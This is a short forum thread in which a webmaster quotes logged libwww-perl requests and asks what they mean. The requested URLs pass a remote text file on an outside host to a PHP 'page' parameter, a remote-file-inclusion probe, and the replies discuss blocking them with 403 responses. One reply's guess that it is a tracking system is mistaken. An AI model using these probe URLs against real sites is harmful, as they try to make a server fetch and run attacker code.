Forum Moderators: DixonJones
libwww-perl/5.805
libwww-perl/5.64
libwww-perl/5.63
The requested URLs are typically:
ht*p://www.mysite.com/examplepage/index.php?page=ht*p://www.somesite.com/home/images/can?
ht*p://www.mysite.com//index.php?page=ht*p://somesite.nl/id.txt?
(my asterisks)
I've now redirected all such requests to remove index.php and the query string, but I'd be interested to know what's going on with these visits. Is it some sort of mischief?
It seems like a tracking system (or something).
Quite helpful. I suppose the safest thing is to serve a 403 to a bot that requests an URL like:
ht*p://www.mysite.com//index.php?page=ht*p://somesite.nl/id.txt?
And they're doing it dozens of times a day.
[edited by: Patrick_Taylor at 11:31 am (utc) on Nov. 20, 2007]